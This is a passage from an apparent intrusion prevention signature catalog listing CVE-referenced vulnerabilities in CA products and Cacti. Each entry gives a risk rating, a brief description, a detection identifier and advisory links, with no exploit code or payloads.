Situation: SunRPC_TCP-CA-BrightStor-Arcserve-Backup-Xdr-Parsing-Buffer-Overflow
References:
CVE-2008-2242
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2242
BID-29283
http://www.securityfocus.com/bid/29283
OSVDB-45368
http://www.osvdb.org/45368
Back to top

CA-BrightStor-Arcserve-Lgserver-Authentication-Username-Overflow

About this vulnerability: A buffer overflow vulnerability in CA BrightStor ARCserve Backup
Risk: High
First detected in: sgpkg-ips-124-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Computer Associates BrightStor ARCserve Backup for Laptops and Desktops; Computer Associates Desktop Management Suite; Computer Associates Protection Suite
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in Computer Associates BrightStor ARCServe Backup. The vulnerability is due to insufficient bounds checking in the LGServer process while performing authentication of users. A remote unauthenticated attacker could exploit this vulnerability by sending an overly large user name to the vulnerable service, and could inject and execute arbitrary code with System privileges.
Situation: ARCserve_CS-CA-BrightStor-ARCserve-Lgserver-Authentication-Username-Overflow
References:
CVE-2007-5003
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5003
BID-24348
http://www.securityfocus.com/bid/24348
Back to top

CA-BrightStor-Backup-Agent-RPC-Server-Connection-Id-Pointer-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the BrightStor Backup Agent RPC server
Risk: High
First detected in: sgpkg-ips-126-2032
Last changed: sgpkg-ips-1554-5242
Platform: Windows
Software: Computer Associates BrightStor
Type: Buffer Overflow
Description: Computer Associates BrightStor Backup Agent has a buffer overflow vulnerability in the handling of certain MSRPC requests. A specially crafted MSRPC request can be used to overflow a buffer and execute arbitrary code with system privileges.
Situation: MSRPC-TCP_CPS-CA-BrightStor-Backup-Agent-Connection-Id-Buffer-Overflow
References:
CVE-2007-5329
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5329
BID-26015
http://www.securityfocus.com/bid/26015
OSVDB-41372
http://www.osvdb.org/41372
Back to top

CA-BrightStor-HSM-Buffer-Overflow

About this vulnerability: A CA BrightStor HSM Buffer Overflow vulnerability
Risk: High
First detected in: sgpkg-ips-803-5242
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Computer Associates BrightStor
Type: Buffer Overflow
Description: A buffer overflow vulnerability in Computer Associates BrightStor Hierarchical Storage Manager, versions before r11.6, that allows remote attackers to execute arbitrary code via long commands to certain opcodes.
Situation: Generic_CS-CA-BrightStor-HSM-Buffer-Overflow
References:
CVE-2007-5082
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5082
BID-25823
http://www.securityfocus.com/bid/25823
OSVDB-41363
http://www.osvdb.org/41363
Back to top

CA-Erwin-Web-Portal-Configserviceprovider-Information-Disclosure

About this vulnerability: A vulnerability in CA Erwin Web Portal
Risk: Moderate
First detected in: sgpkg-ips-583-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: CA Erwin Web Portal
Type: Directory Traversal
Description: An information disclosure vulnerability exists in CA ERwin Web Portal. This vulnerability is due to lack of authentication and insufficient input validation in the ConfigServiceProvider servlet when processing HTTP requests. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to view the contents of arbitrary XML files on a target system, including XML files which store database credentials.
Situation: HTTP_CS-CA-Erwin-Web-Portal-Configserviceprovider-Information-Disclosure
References:
CVE-2014-2210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2210
BID-66644
http://www.securityfocus.com/bid/66644
OSVDB-106135
http://www.osvdb.org/106135
Back to top

CA-Erwin-Web-Portal-Configserviceprovider-Remote-File-Creation

About this vulnerability: A vulnerability in CA Erwin Web Portal
Risk: High
First detected in: sgpkg-ips-588-5211
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: CA Erwin Web Portal
Type: Directory Traversal
Description: A remote file creation/overwrite vulnerability exists in CA ERwin Web Portal. This vulnerability is due to lack of authentication and insufficient input validation in the ConfigServiceProvider servlet when processing HTTP requests. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to create/overwrite arbitrary XML files on a target system.
Situation: HTTP_CS-CA-Erwin-Web-Portal-Configserviceprovider-Remote-File-Creation
References:
CVE-2014-2210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2210
BID-66644
http://www.securityfocus.com/bid/66644
OSVDB-105359
http://www.osvdb.org/105359
Back to top

CA-Erwin-Web-Portal-Fileaccessserviceprovider-Denial-Of-Service

About this vulnerability: A vulnerability in CA Erwin Web Portal
Risk: Moderate
First detected in: sgpkg-ips-581-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CA Erwin Web Portal
Type: Directory Traversal
Description: A directory traversal vulnerability exists in CA ERwin Web Portal. This vulnerability is due to lack of authentication and insufficient input validation in the FileAccessServiceProvider servlet when processing HTTP requests. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage this vulnerability to delete arbitrary files recursively on a target system.
Situation: HTTP_CS-CA-Erwin-Web-Portal-Fileaccessserviceprovider-Denial-Of-Service
References:
CVE-2014-2210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2210
BID-66644
http://www.securityfocus.com/bid/66644
OSVDB-106136
http://www.osvdb.org/106136
Back to top

CA-Erwin-Web-Portal-Profileiconservlet-Information-Disclosure

About this vulnerability: A vulnerability in CA Erwin Web Portal
Risk: Moderate
First detected in: sgpkg-ips-579-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CA Erwin Web Portal
Type: Directory Traversal
Description: Two information disclosure vulnerabilities exist in CA ERwin Web Portal. These vulnerabilities are due to lack of authentication and insufficient input validation in the ProfileIconServlet servlet when processing multiple HTTP request parameters. By sending crafted HTTP requests to the target system, a remote unauthenticated attacker can leverage these vulnerabilities to view the contents of arbitrary files on a target system.
Situation: HTTP_CSU-CA-Erwin-Web-Portal-Profileiconservlet-Information-Disclosure
References:
CVE-2014-2210
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2210
BID-66644
http://www.securityfocus.com/bid/66644
OSVDB-106137
http://www.osvdb.org/106137
Back to top

CA-eTrust-Intrusion-Detection-Encryption-Key-Handling-Denial-Of-Service

About this vulnerability: A vulnerability in CA eTrust Intrusion Detection
Risk: Moderate
First detected in: sgpkg-ips-564-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Computer Associates eTrust Intrusion Detection
Type: Malfunction
Description: There exists a memory corruption vulnerability in CA eTrust Intrusion Detection. The flaw is due to an input validation error in the administrative login functionality of the eTrust Intrusion Detection server. A remote unauthenticated attacker may leverage this vulnerability to cause a denial of service condition on the vulnerable system. The affected service will terminate after processing the malicious message, creating a denial-of-service condition. This will cause all the other active network connections to the server to be dropped and the service needs to be restarted manually to restore the functionality.
Situation: Generic_CS-CA-eTrust-Intrusion-Detection-Encryption-Key-Handling-Denial-Of-Service
References:
CVE-2007-1005
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1005
BID-22743
http://www.securityfocus.com/bid/22743
Back to top

CA-eTrust-PestPatrol-ActiveX-Control-Buffer-Overflow

About this vulnerability: A vulnerability in Computer Associates eTrust PestPatrol
Risk: High
First detected in: sgpkg-ips-372-4219
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Computer Associates eTrust PestPatrol
Type: Buffer Overflow
Description: There exists a vulnerability in Computer Associates eTrust PestPatrol ActiveX control. The vulnerability is due to an insufficient input validation when processing user supplied data. A successful exploitation may lead to code execution in the context of the current user.
Situation: HTTP_SS-CA-eTrust-PestPatrol-ActiveX-Control-Buffer-Overflow
File-Text_CA-eTrust-PestPatrol-ActiveX-Control-Buffer-Overflow
References:
CVE-2009-4225
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4225
BID-37133
http://www.securityfocus.com/bid/37133
OSVDB-60862
http://www.osvdb.org/60862
Back to top

CA-eTrust-Secure-Content-Manager-Gateway-FTP-Pasv-Stack-Overflow

About this vulnerability: A vulnerability in CA eTrust Secure Content Manager
Risk: High
First detected in: sgpkg-ips-382-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Computer Associates eTrust Secure Content Manager
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in CA eTrust Secure Content Manager. The vulnerability is due to insufficient bounds checking on certain FTP responses. A remote unauthenticated attacker can exploit this vulnerability by sending a specially crafted FTP PASV response to the target server, potentially causing arbitrary code injection and execution with the privileges of the affected process, normally System.
Situation: FTP_SS-CA-eTrust-Secure-Content-Manager-Gateway-FTP-Pasv-Stack-Overflow
References:
CVE-2008-2541
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2541
BID-29528
http://www.securityfocus.com/bid/29528
Back to top

CA-Internet-Security-Suite-Xmlsecdb-ActiveX-Insecure-File-Creation

About this vulnerability: A vulnerability in CA Host-Based Intrusion Prevention System
Risk: High
First detected in: sgpkg-ips-379-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CA Host-Based Intrusion Prevention System; CA Internet Security Suite
Type: Malfunction
Description: An insecure file creation vulnerability exists in CA Internet Security Suite. The vulnerability is due to an error when the XMLSecDB ActiveX control, which is installed with the HIPSEngine component, handles SetXml and Save methods. A remote unauthenticated attacker can exploit this vulnerability by enticing a target user to open a maliciously crafted HTML page. Successful exploitation could possibly allow attackers to execute arbitrary code within the context of the current user.
Situation: HTTP_SS-CA-Internet-Security-Suite-Xmlsecdb-ActiveX-Insecure-File-Creation
File-Text_CA-Internet-Security-Suite-Xmlsecdb-ActiveX-Insecure-File-Creation
References:
CVE-2011-1036
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1036
BID-46539
http://www.securityfocus.com/bid/46539
Back to top

CA-License-Client-PUTOLF-Request-Directory-Traversal

About this vulnerability: Buffer overflow in CA License Client
Risk: Moderate
First detected in: sgpkg-ips-22-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Computer Associates License
Type: Directory Traversal
Description: Computer Associates (CA) License Client contains a directory traversal vulnerability. A remote attacker could exploit this vulnerability to create arbitrary files on the system via .. (dot dot) style attack.
Situation: Generic_CA-License-Client-PUTOLF-Request-Directory-Traversal
References:
CVE-2005-0583
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0583
BID-12705
http://www.securityfocus.com/bid/12705
Back to top

CA-License-Client-Server-Getconfig-BOF

About this vulnerability: Buffer overflow in CA License Client and Server
Risk: High
First detected in: sgpkg-ips-45-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Computer Associates License
Type: Buffer Overflow
Description: Computer Associates (CA) License Client and Server contain a buffer overflow due to insufficient bounds checking of the last parameter in the GETCONFIG request. A remote attacker could exploit this vulnerability to execute arbitrary code on the system.
Situation: Generic_CA-License-Client-Getconfig-BOF
Generic_CA-License-Server-Getconfig-BOF
References:
CVE-2005-0581
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0581
BID-12705
http://www.securityfocus.com/bid/12705
Back to top

CA-License-Software-GCR-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the Computer Associates License software of Computer Associates products
Risk: Moderate
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Computer Associates License
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in the Computer Associates License software of Computer Associates products. By sending a malformed GCR message to the affected service, a remote attacker can cause a DoS or compromise the vulnerable system.
Situation: Generic_CA-License-Software-GCR-Buffer-Overflow
References:
CVE-2005-0581
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0581
BID-12705
http://www.securityfocus.com/bid/12705
OSVDB-14320
http://www.osvdb.org/14320
OSVDB-14321
http://www.osvdb.org/14321
Back to top

CA-License-Software-Invalid-Command-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the Computer Associates License software in Computer Associates products
Risk: High
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Computer Associates License
Type: Buffer Overflow
Description: The Computer Associates License software in Computer Associates products has a stack buffer overflow vulnerability due to insufficient bounds checking on user-supplied values in requests with an invalid format. A remote attacker could exploit this vulnerability to execute root/system level arbitrary code on the system.
Situation: Generic_CA-License-Software-Invalid-Command-Buffer-Overflow
References:
CVE-2005-0581
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0581
BID-12705
http://www.securityfocus.com/bid/12705
Back to top

CA-License-Software-PUTOLF-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerablility in the Computer Associates License software of Computer Associates products
Risk: High
First detected in: sgpkg-ips-45-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Computer Associates License
Type: Buffer Overflow
Description: The Computer Associates License software in Computer Associates products has a stack buffer overflow vulnerability due to insufficient bounds checking of the filename parameter and the data parameter in the PUTOLF request. A remote attacker can exploit this vulnerability to execute root/system level arbitrary code on the target system.
Situation: Generic_CA-License-Software-PUTOLF-Buffer-Overflow
References:
CVE-2005-0582
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-0582
BID-12705
http://www.securityfocus.com/bid/12705
Back to top

CA-Multiple-Products-Console-Server-Login-Credentials-Handling-BOF

About this vulnerability: Buffer overflow vulnerability in the Console Server shipped with multiple Computer Associates products
Risk: High
First detected in: sgpkg-ips-110-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Computer Associates Protection Suite 3; Computer Associates Anti-Spyware for the Enterprise 8; Computer Associates Anti-Virus for the Enterprise; Computer Associates Threat Manager for the Enterprise
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in the Console Server shipped with multiple Computer Associates products. A successful exploitation allows an unauthenticated remote attacker to compromise the vulnerable server.
Situation: Generic_CA-Multiple-Products-Console-Server-Login-Credentials-Handling-BOF
References:
CVE-2007-2522
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2522
BID-23906
http://www.securityfocus.com/bid/23906
OSVDB-34585
http://www.osvdb.org/34585
Back to top

CA-Products-Discovery-Service-Buffer-Overflow

About this vulnerability: A vulnerability in CA BrightStor ARCserve Backup
Risk: Moderate
First detected in: sgpkg-ips-435-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Computer Associates BrightStor ARCserve Backup
Type: Buffer Overflow
Description: A buffer overflow vulnerability has been reported in the Discovery Service of multiple products developed by Computer Associates. The vulnerability is due to the failure of the application in checking the length of a received Host Name string during the discovery process. An unauthenticated remote attacker may use this flaw to remotely inject and execute code on the the vulnerable system with System level privileges. In an attack case where code injection is not successful, the affected service will terminate upon processing of the malicious message. If the service is not configured to restart automatically, the services will be unavailable until the process is restarted manually. In a more sophisticated attack, where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the service process. On Windows systems, the affected service is running with SYSTEM privileges by default configuration.
Situation: Generic_CS-CA-Products-Discovery-Service-Buffer-Overflow
References:
CVE-2006-5143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5143
BID-20364
http://www.securityfocus.com/bid/20364
Back to top

CA-Products-Message-Queuing-Server-Buffer-Overflow

About this vulnerability: A vulnerability in CA Advantage Data Transformer
Risk: High
First detected in: sgpkg-ips-362-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CA Message Queuing
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in the way CA Message Queuing Server handles incoming packets. The vulnerability is due to lack of boundary protection while processing packets. A remote unauthenticated attacker may exploit this vulnerability to cause a denial of service condition or inject and execute arbitrary code on the vulnerable system within the security context of the affected service, normally System. In a more sophisticated attack where code injection is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security context of the affected service. In an attack case where code injection is not successful, the affected server will terminate.
Situation: Generic_CS-CA-Products-Message-Queuing-Server-Buffer-Overflow
References:
CVE-2007-0060
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0060
BID-25051
http://www.securityfocus.com/bid/25051
Back to top

CA-Total-Defense-Suite-UNCWS-Exportreport-SQL-Injection

About this vulnerability: A vulnerability in CA Total Defense Suite
Risk: Moderate
First detected in: sgpkg-ips-443-4219
Last changed: sgpkg-ips-1453-5242
Platform: Generic
Software: CA Total Defense Suite
Type: Input Validation
Description: There is an SQL Injection vulnerability in CA Total Defense Suite UNC Management Console. The vulnerability is due to insufficient sanitization of the request parameters in a stored procedure. A remote unauthenticated attacker can exploit this vulnerability by sending a craft SOAP request to the target on port 34444 for HTTP and 34443 for HTTPS. Any injected SQL commands will run with DBA privileges. This vulnerability can be leveraged by a remote unauthenticated attacker to execute arbitrary code on a target system with SYSTEM privileges by the means of SQL exec function.
Situation: File-TextId_CA-Total-Defense-Suite-UNCWS-Exportreport-SQL-Injection
Back to top

CA-Total-Defense-Suite-UNCWS-UnassignFunctionalRoles-SQL-Injection

About this vulnerability: A vulnerability in CA Total Defense Suite
Risk: Moderate
First detected in: sgpkg-ips-389-4219
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: CA Total Defense Suite
Type: Input Validation
Description: A SQL Injection vulnerability exists in CA Total Defense Suite that can be reached through the remote web service call UnAssignFunctionalUsers. The vulnerability is due to insufficient handling of the request's modifiedData parameter. The stored procedure uncsp_UnassignFunctionalRoles uses this value in a dynamic SQL statement without any input validation. Any injected SQL commands will run with DBA privileges. This vulnerability can be leveraged by a remote unauthenticated attacker to execute arbitrary code on a target system with SYSTEM privileges by the means of SQL exec function.
Situation: HTTP_CS-CA-Total-Defense-Suite-UNCWS-UnassignFunctionalRoles-SQL-Injection
HTTP_CRL-CA-Total-Defense-Suite-UNCWS-UnassignFunctionalRoles-SQL-Injection
References:
CVE-2011-1653
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1653
BID-47355
http://www.securityfocus.com/bid/47355
Back to top

CA-Unified-Infrastructure-Management-Download_lar.Jsp-Directory-Traversal

About this vulnerability: A vulnerability in CA Unified Infrastructure Management
Risk: Moderate
First detected in: sgpkg-ips-822-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: CA Unified Infrastructure Management
Type: Directory Traversal
Description: Insufficient validation of request parameters causes a directory traversal vulnerability in CA Unified Infrastructure Management. A successful exploitation allows an attacker to download arbitrary files on the target server.
Situation: HTTP_CRL-CA-Unified-Infrastructure-Management-Download_lar.Jsp-Directory-Traversal
References:
CVE-2016-5803
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5803
Back to top

CA-Unified-Infrastructure-Management-Nimcontroller-Buffer-Overflow

About this vulnerability: A vulnerability in CA Unified Infrastructure Management Nimcontroller
Risk: High
First detected in: sgpkg-ips-1280-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Nimcontroller
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in CA Unified Infrastructure Management Nimcontroller, version 7.80.3132, which allows remote attackers to execute arbitrary code by sending a crafted directory list probe.
Situation: Generic_TCP-CA-Unified-Infrastructure-Management-Nimcontroller-Buffer-Overflow
References:
CVE-2020-8012
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8012
Back to top

CA-XOsoft-Products-Xosoapapi-Buffer-Overflow

About this vulnerability: A vulnerability in Computer Associates XOsoft products
Risk: High
First detected in: sgpkg-ips-367-4219
Last changed: sgpkg-ips-1589-5242
Platform: Windows
Software: CA XOsoft
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability exists in Computer Associates XOsoft products. The vulnerability is due to insufficient boundary checking when handling certain HTTP requests sent to the ws_man.exe process. A remote unauthenticated attacker can exploit this vulnerability by sending a malicious HTTP request to a target server. In a successful attack, where arbitrary code is injected and executed on the vulnerable target host, the behaviour of the target system is dependent on the malicious code. Note that any code executed by the attacker runs with the privileges of the service.
Situation: HTTP_CRL-CA-XOsoft-Products-Xosoapapi-Buffer-Overflow
References:
CVE-2010-1223
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1223
BID-39238
http://www.securityfocus.com/bid/39238
Back to top

Cabinet-Archive-File-Transfer

About this vulnerability: Arbitary cabinet file transfer
Risk: Low
First detected in: sgpkg-ips-138-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Backdoor
Description: Microsoft Windows Cabinet files are archives that are typically used to install and execute software on the host. Arbitrary executable file transfer across untrusted networks may expose the system to malware infection or indicate an existing infection under some conditions.
Situation: Shared_Microsoft-Cabinet-File-Download
File-Binary_Microsoft-Cabinet-Transfer
Back to top

CachetHQ-Cachet-Createincidentcommandhandler-Template-Injection

About this vulnerability: A vulnerability in CachetHQ Cachet
Risk: Moderate
First detected in: sgpkg-ips-1647-5242
Last changed: sgpkg-ips-1647-5242
Platform: Generic
Software: CachetHQ Cachet
Type: Malfunction
Description: Unsanitized user data in Twig templates causes a command injection vulnerability in CachetHQ Cachet. A successful exploit allows an attacker to execute arbitrary commands on the target system.
Situation: HTTP_CRL-CachetHQ-Cachet-Createincidentcommandhandler-Template-Injection
References:
CVE-2023-43661
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-43661
Back to top

Cacti-Color-Filter-SQLi-To-RCE

About this vulnerability: A vulnerability in Cacti.
Risk: High
First detected in: sgpkg-ips-1364-5242
Last changed: sgpkg-ips-1731-5242
Platform: Generic
Software: Cacti
Type: Input Validation
Description: A vulnerability in Cacti, versions 1.2.12 and before, which allows remote attackers to execute arbitrary code through the filter parameter to color.php, due to insufficient input validation.
Situation: HTTP_CRL-Cacti-Group-Cacti-Color.php-SQL-Injection
References:
CVE-2020-14295
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14295
Back to top

Cacti-Group-Cacti-Automation-Graph-And-Tree-Rules-Name-Stored-XSS

About this vulnerability: A vulnerability in Cacti Group
Risk: Moderate
First detected in: sgpkg-ips-1756-5242
Last changed: sgpkg-ips-1756-5242
Platform: Generic
Software: Cacti
Type: Input Validation
Description: A stored cross-site scripting vulnerability has been reported in Cacti. The vulnerability is due to improper validation of the name parameter when adding/editing the automation graph and tree rules. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary script execution on a victim's browser.
Situation: HTTP_CRL-Cacti-Group-Cacti-Automation-Graph-And-Tree-Rules-Name-Stored-XSS
References:
CVE-2024-31444
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31444
Back to top

Cacti-Group-Cacti-Build_Graph_Object_SQL_Having-SQL-Injection

About this vulnerability: A vulnerability in Cacti
Risk: Moderate
First detected in: sgpkg-ips-1744-5242
Last changed: sgpkg-ips-1744-5242
Platform: Generic
Software: Cacti
Type: Input Validation
Description: Improper validation of user input used in the build_graph_object_sql_having function. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Cacti-Build_Graph_Object_SQL_Having-SQL-Injection
References:
CVE-2024-31445
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31445
Back to top

Cacti-Group-Cacti-Color.php-SQL-Injection

About this vulnerability: A vulnerability in Cacti Group Cacti
Risk: High
First detected in: sgpkg-ips-1275-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cacti
Type: Input Validation
Description: A SQL injection vulnerability has been reported in Cacti. The vulnerability is due to improper sanitization of the filter request parameter in color.php. A remote, authenticated attacker could exploit this vulnerability by sending a maliciously crafted request to the target server. Successful exploitation could result in the execution of arbitrary SQL commands against the cacti database that leads to arbitrary code execution on the target server.
Situation: HTTP_CRL-Cacti-Group-Cacti-Color.php-SQL-Injection
References:
CVE-2020-14295
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14295
Back to top

Cacti-Group-Cacti-Graphs.php-SQL-Injection

About this vulnerability: A vulnerability in Cacti Group Cacti
Risk: Moderate
First detected in: sgpkg-ips-1221-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Cacti
Type: Input Validation
Description: A SQL injection vulnerability has been reported in Cacti. The vulnerability is due to improper validation of user supplied input in requests to graphs.php. A remote, authenticated attacker could exploit this vulnerability by sending a maliciously crafted request to the target server. Successful exploitation could result in the execution of arbitrary SQL commands against the database on the target server.
Situation: HTTP_CRL-Cacti-Group-Cacti-Graphs.php-SQL-Injection
References:
CVE-2019-17357
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17357
Back to top

Cacti-Group-Cacti-Graph_view.php-SQL-Injection

About this vulnerability: A vulnerability in Cacti Group Cacti
Risk: High
First detected in: sgpkg-ips-1635-5242
Last changed: sgpkg-ips-1635-5242
Platform: Generic
Software: Cacti
Type: Input Validation
Description: An SQL injection vulnerability has been reported in Cacti. The vulnerability is due to improper validation of user data in the graph_view.php script. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary SQL command execution against the database on the target server.
Situation: HTTP_CSU-Cacti-Group-Cacti-Graph_view.php-SQL-Injection
References:
CVE-2023-39361
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39361
Back to top

Cacti-Group-Cacti-Installer-Setpaths-Log-Path-Arbitrary-File-Write

About this vulnerability: A vulnerability in Cacti Group Cacti
Risk: Moderate
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1795-5242
Platform: Generic
Software: Cacti
Type: Input Validation
Description: Insufficient validation of a log path parameter in installer.php causes an arbitrary file write vulnerability in Cacti. A successful exploitation allows an attacker to write and potentially execute arbitrary files on the target system.
Situation: HTTP_CRL-Cacti-Group-Cacti-Installer-Setpaths-Log-Path-Arbitrary-File-Write
References:
CVE-2024-43363
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-43363
Back to top

Cacti-Group-Cacti-Managers-SQL-Injection

About this vulnerability: A vulnerability in Cacti Group Cacti
Risk: Moderate
First detected in: sgpkg-ips-1689-5242
Last changed: sgpkg-ips-1689-5242
Platform: Generic
Software: Cacti
Type: Input Validation
Description: Improper validation of user data used in SQL queries in the managers.php file causes an SQL injection vulnerability in Cacti. A successful exploit allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Cacti-Group-Cacti-Managers-SQL-Injection
References:
CVE-2023-51448
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-51448
Back to top

Cacti-Group-Cacti-Package_import.php-Arbitrary-File-Write

About this vulnerability: A vulnerability in Cacti
Risk: High
First detected in: sgpkg-ips-1745-5242
Last changed: sgpkg-ips-1745-5242
Platform: Generic
Software: Cacti
Type: Input Validation
Description: An arbitrary file write vulnerability has been reported in Cacti. The vulnerability is due to insufficient validation of user data in package_import.php and the import_package() function in import.php. A remote, authenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary file write on the target server.
Situation: HTTP_CS-Cacti-Group-Cacti-Package_import.php-Potential-Arbitrary-File-Write
HTTP_CS-Cacti-Group-Cacti-Package_import.php-Arbitrary-File-Write
References:
CVE-2024-25641
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-25641
Back to top

Cacti-Group-Cacti-poller_automation.php-Command-Injection

About this vulnerability: A vulnerability in Cacti Group Cacti
Risk: High
First detected in: sgpkg-ips-1234-5242
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: Cacti
Type: Input Validation
Description: There exists a vulnerability in Cacti, version 1.2.8, which allows remote attackers to execute arbitrary code through the path_boost_log parameter in poller_automation.php, due to insufficient user input validation.
Situation: HTTP_CRL-Cacti-Group-Cacti-poller_automation.php-Command-Injection
References:
CVE-2020-7237
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7237
Back to top

Cacti-Group-Cacti-Remote_Agent-Command-Injection

About this vulnerability: A vulnerability in Cacti Group Cacti
Risk: Moderate
First detected in: sgpkg-ips-1543-5242
Last changed: sgpkg-ips-1543-5242
Platform: Generic
Software: Cacti
Type: Input Validation
Description: An access control weakness and insufficient validation of user data when receiving requests from Cacti pollers cause a command injection vulnerability in Cacti. A successful exploit allows an attacker to execute arbitrary commands on the target system.
Situation: HTTP_CRL-Cacti-Group-Cacti-Remote_Agent-Command-Injection
HTTP_CSH-Cacti-Group-Cacti-Remote_Agent-Command-Injection
References:
CVE-2022-46169
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-46169
Back to top

Cacti-Group-Cacti-Rrdtool-Crlf-Injection

About this vulnerability: A vulnerability in Cacti
Risk: Moderate
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Platform: Generic
Software: Cacti
Type: Input Validation
Description: Improper input validation when using the RRDTool binary to create graphs causes a CRLF injection vulnerability in Cacti. A successful exploitation may allow an attacker to write files and execute code on the target system.
Situation: HTTP_CRL-Cacti-Group-Cacti-Rrdtool-Crlf-Injection
References:
CVE-2025-24367
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-24367
Back to top

Cacti-Group-Cacti-SNMP_Escape_String-Command-Injection

About this vulnerability: An attempt to exploit a vulnerability in Cacti detected
Risk: High
First detected in: sgpkg-ips-1644-5242
Last changed: sgpkg-ips-1644-5242
Platform: Unix;Linux
Software: Cacti
Type: Input Validation
Description: A vulnerability in Cacti, versions prior to 1.2.25 and prior to 1.3.0, which allows remote attackers to execute arbitrary code to host.php due to insufficient input validation of several parameters.
Situation: HTTP_CRL-Cacti-Group-Cacti-SNMP_Escape_String-Command-Injection
References:
CVE-2023-39362
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39362
Back to top

Cacti-Group-Cacti-SQL_Save-SQL-Injection

About this vulnerability: A vulnerability in Cacti Group Cacti
Risk: Moderate
